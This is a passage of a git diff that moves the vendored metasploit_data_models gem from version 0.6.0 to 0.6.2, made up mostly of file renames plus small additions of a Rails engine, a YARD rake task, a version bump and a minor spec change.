b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000002_expand_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000002_expand_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000003_expand_details2.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000003_expand_details2.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000004_add_vuln_attempts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000004_add_vuln_attempts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000006_add_module_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000006_add_module_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000007_add_exploit_attempts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000007_add_exploit_attempts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000008_add_fail_message.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000008_add_fail_message.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm/host/operating_system_normalization.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm/host/operating_system_normalization.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/base64_serializer.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/base64_serializer.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/engine.rb new file mode 100644 index 0000000000..0c73ec36d8 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/engine.rb @@ -0,0 +1,23 @@ +require 'rails' + +module MetasploitDataModels + class Engine < Rails::Engine + # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl + config.generators do |g| + g.assets false + g.fixture_replacement :factory_girl, :dir => 'spec/factories' + g.helper false + g.test_framework :rspec, :fixture => false + end + + initializer 'metasploit_data_models.prepend_factory_path', :after => 'factory_girl.set_factory_paths' do + if defined? FactoryGirl + relative_definition_file_path = config.generators.options[:factory_girl][:dir] + definition_file_path = root.join(relative_definition_file_path) + + # unshift so that Pro can modify mdm factories + FactoryGirl.definition_file_paths.unshift definition_file_path + end + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/serialized_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/serialized_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/ip_format_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/ip_format_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/version.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/version.rb index 6532b907d4..c390409678 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/version.rb @@ -4,5 +4,5 @@ module MetasploitDataModels # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework # and pro, so models may be removed in the future. Because of the unstable API the version should remain below 1.0.0 - VERSION = '0.6.0' + VERSION = '0.6.2' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/tasks/yard.rake new file mode 100644 index 0000000000..fc5357034e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/tasks/yard.rake @@ -0,0 +1,26 @@ +# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both +# the below rake tasks and when invoking `yard` from the command line + +if defined? YARD + namespace :yard do + YARD::Rake::YardocTask.new(:doc) do |t| + # --no-stats here as 'stats' task called after will print fuller stats + t.options = ['--no-stats'] + + t.after = Proc.new { + Rake::Task['yard:stats'].execute + } + end + + desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods" + task :stats => :environment do + stats = YARD::CLI::Stats.new + stats.run('--compact', '--list-undoc') + end + end + + # @todo Figure out how to just clone description from yard:doc + desc "Generate YARD documentation" + # allow calling namespace to as a task that goes to default task for namespace + task :yard => ['yard:doc'] +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/metasploit_data_models.gemspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/metasploit_data_models.gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/app/models/mdm/web_vuln_spec.rb similarity index 99% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/app/models/mdm/web_vuln_spec.rb index 904a19fe0b..cd1ba8c0c4 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/app/models/mdm/web_vuln_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' describe Mdm::WebVuln do let(:confidence_range) do - 1 .. 100 + 0 .. 100 end let(:default_params) do diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/javascripts/application.js similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/javascripts/application.js diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/stylesheets/application.css similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/stylesheets/application.css diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/controllers/application_controller.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/controllers/application_controller.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/helpers/application_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/helpers/application_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/mailers/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/mailers/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/models/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/models/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/views/layouts/application.html.erb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/views/layouts/application.html.erb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config.ru similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config.ru diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/application.rb similarity index 98% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/application.rb index 52720f259a..12e48c8451 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/application.rb @@ -2,7 +2,7 @@ require File.expand_path('../boot', __FILE__) require 'rails/all' -Bundler.require +Bundler.require(*Rails.groups) # require the engine being tested. In a non-dummy app this would be handled by the engine's gem being in the Gemfile # for real app and Bundler.require requiring the gem. require 'metasploit_data_models' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/boot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/boot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/database.yml.example similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/database.yml.example diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/development.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/development.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/production.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/production.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/test.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/test.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/backtrace_silencers.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/backtrace_silencers.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/inflections.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/inflections.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/mime_types.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/mime_types.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/secret_token.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/secret_token.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/session_store.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/session_store.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/wrap_parameters.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/wrap_parameters.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/routes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/routes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/db/schema.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/db/schema.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/lib/assets/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/lib/assets/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/log/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/log/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/404.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/404.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/422.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/422.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/500.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/500.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/favicon.ico similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/favicon.ico diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/addresses.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/addresses.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/services.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/services.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/users.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/users.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_sites.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb rename to 